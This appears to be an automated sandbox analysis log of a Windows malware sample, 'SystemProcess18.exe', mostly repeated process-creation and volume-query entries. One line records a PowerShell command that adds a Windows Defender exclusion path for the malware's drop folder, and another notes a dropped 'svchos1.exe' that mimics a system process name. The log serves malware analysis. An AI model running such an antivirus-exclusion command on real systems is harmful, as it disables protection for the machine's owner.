          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035DF0E0 Sleep,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetCurrentThreadId,PostThreadMessageA,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetCommandLineA,CreateMutexA,GetLastError,strstr,Sleep,Sleep,OpenSCManagerA,OpenServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,ExitProcess,CloseServiceHandle,CloseServiceHandle,Sleep,Sleep,sprintf,ExitProcess,sprintf,sprintf,GetModuleFileNameA,sprintf,Sleep,sprintf,ExitProcess,Sleep,Sleep,Sleep,Sleep,28_2_035DF0E0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035E0BF0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,28_2_035E0BF0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_034C3B44 cpuid 28_2_034C3B44
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,28_2_006B2A97
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,29_2_006B2A97
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
